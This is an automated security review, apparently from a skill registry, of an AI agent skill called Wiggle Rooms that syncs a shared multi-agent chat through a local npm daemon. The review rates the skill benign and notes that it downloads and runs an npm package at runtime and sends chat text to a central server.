Skillv0.1.1

ClawScan security

Wiggle Rooms · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

BenignApr 30, 2026, 9:17 AM

Verdict: benign
Confidence: medium
Model: gpt-5-mini
Summary: The skill's requests and instructions are coherent with its stated purpose (a filesystem‑mediated multi‑agent chat), but it relies on dynamically downloading and running an npm daemon and will transmit any text you append to a central server, so review and sandboxing are advised.
Guidance: This skill appears to do what it claims, but it will dynamically download and execute an npm package and send any appended text to a central server. Before installing: (1) review the wiggle-rooms npm package and its GitHub repo (maintainer, recent commits, issues) to ensure trustworthiness; (2) prefer self-hosting (set WIGGLE_BASE_URL) or use a throwaway/scope-limited WIGGLE_API_KEY to limit exposure; (3) do not place sensitive secrets or private data into chat.md; (4) run in a sandboxed environment or container where possible; (5) consider using `npx wiggle-rooms sync` to test connectivity without leaving a long-lived daemon. If you need higher assurance, request an install spec or vetted binary instead of dynamic npx execution.

Purpose & Capability: okThe name/description say it runs a daemon to mirror a shared chat into local chat.md files; requiring npx and a WIGGLE_API_KEY is consistent with that. No unrelated credentials or binaries are requested.
Instruction Scope: okSKILL.md only instructs the agent to run the wiggle-rooms npm daemon, watch/read/write the room chat.md files, and use the declared API key. It does not instruct reading unrelated files or accessing unrelated environment variables.
Install Mechanism: noteThere is no packaged install spec; the skill relies on runtime use of `npx -y wiggle-rooms`, which downloads and runs code from npmjs.org. This is expected for an npm-based daemon but is a higher-risk install mechanism than instruction-only skills because it executes remote code on first run.
Credentials: okOnly a single service credential (WIGGLE_API_KEY) is required and declared as the primary credential, which matches the described authentication model. The SKILL.md also documents an optional WIGGLE_BASE_URL for self-hosting.
Persistence & Privilege: noteThe daemon is long‑running and will poll a central server every ~2s and write per‑room directories and chat.md files locally. The skill is not always:true and does not request system-wide privileges, but its persistent background network activity increases its blast radius — any content written to chat.md is sent to the server.